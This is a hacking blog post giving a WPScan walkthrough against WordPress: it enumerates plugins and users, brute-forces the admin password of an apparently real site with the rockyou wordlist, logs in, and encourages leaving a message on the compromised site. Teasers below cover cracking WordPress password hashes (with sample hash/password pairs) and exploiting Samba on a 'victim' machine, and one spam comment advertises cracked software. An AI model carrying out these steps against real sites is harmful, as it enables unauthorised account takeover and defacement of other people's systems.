Wpscan Attack Wordpress

-
Equipments:
1. Wpscan
2. Rockyou (Wordlist)

Install and Fixed Wpscan on Kali Linux http://h2-exploitation.blogspot.com/2013/06/fix-wpscan-on-kali-linux.html
Download Rockyou (wordlist)

Directly stage to attacks =))

Run a wpscan :
# cd /usr/share/wpscan/ && ./wpscan.rb --help


there are many options of these commands, but only a few that will I use this testing:

The next remedy simply by adding the target of call - url "www.target.com" or "http://www.target.com/PATH/ and then add the - enumerate [OPTION] as shown below.
# ./wpscan.rb --url "www.your-target.com/PATH/" --enumerate P

--url = The wordPress URL/domain to scan
--enumerate P = Enumerate installed plugins

Seen above that I got 2 pieces of plugins.

Next, look for username.
# ./wpscan.rb --url "www.your-target.com/PATH/"--enumerate u

--enumerate u = Enumerate users

huyuuu, I get a username "admin"

Next. perform brute force against the target site:
./wpscan.rb --url http://www.rewardprograms.org/thefreegeek/ --wordlist /usr/share/wordlists/rockyou.lst --threads 50

--wordlist /usr/share/wordlist/rockyou.lst = wordlist I put it in /usr/share/wordlist/ by name rockyou.lst 
--threads 50 =  The number of threads to use when multi-threading

Yeah,  I think we have succeeded in getting the targets password.
Username = admin
Password = pentest

Login testing



That's cool man, success for login.

Now. Please leave a message at the target site =))



Regards :
Hidemichi-Hiroyuki a.k.a [H2]

Comments

  1. liker boyJanuary 5, 2015 at 1:52 AM

    Wow, Excellent post. This article is really very interesting and effective. I think its must be helpful for us. Thanks for sharing your informative.
    social exchange sites
    earn money online
    social bookmarking sites list
    directory submission site list
    article submission sites
    blog commenting sites
    forum posting sites
    press release sites list
    outsourcing
    off page seo
    seo tutorial
    free seo tools
    freelancing
    freelancing sites
    seo

    ReplyDelete
  2. MHAugust 5, 2015 at 11:39 AM

    I was   about   to   say   something   on this   topic.   But   now   i   can see   that   everything   on   this   topic is   very amazing and mind   blowing,   so   i   have   nothing to   say   here.   I   am   just   going   through   all   the   topics   and being   appreciated.   Thanks   for sharing.     

    ReplyDelete
  3. hammadNovember 25, 2015 at 4:28 AM

    Your method of describing everything in this post is actually good, all can simply
    be aware of it, Thanks a lot.
    YAC Antivirus Crack

    ReplyDelete

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

-
Image
Hy, I'm back again. I will discuss how to Decrypt a password in the form the MD5 hash wordpress. here are some examples of hash md5 encryption wordpress will we Decrypt: HASH                                                                                  PASS $P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne  $P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez $P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123 $P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3 $P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d many of my friends are overwhelmed when decrypt wordpress md5 hash. so are they wasting their jobs because they could not solve this one password. Equipments: 1. Hashcat             ==> Decrypt Hash 2.  Rockyou.txt       ==> Wordlists 3. Hash-Identifier   ==> to see hash mode Here I use the Operating System Kali Linux. First Step : we see the  kind of hash we will Decrypt. to facilitate us in decryption
Read more

Exploit Samba "SmbClient"

-
Image
Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-PC. now,
Read more

Configure Pure-FTP on Kali Linux

-
Image
FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21. Contents : 1. Installasion 2. Configuration 3. Run Installation Pure-Ftpd # apt-get install pure-ftpd Installation Success =)) Configure Ftpd add new group: # groupadd ftpgroup add user: # useradd -g ftpgroup -d /dev/null -s /etc ftpuser -g =  name or ID of the primary group of the new account -d = home directory of the new account -s = login shell of the new account configure store a list of users: # pure-pw useradd myftp -u ftpuser -d /home/ftp/pub/myftp myftp = your ftp username please enter you password. configure puredb database file # pure-pw mkdb The next entry to the directory /etc/pure-ftpd/auth/ # cd /etc/pure-ftpd/auth then Create hard links by default: # ln -s ../conf/PureDB 60pdb then, make a directory /ftp # mkdir /home/ft
Read more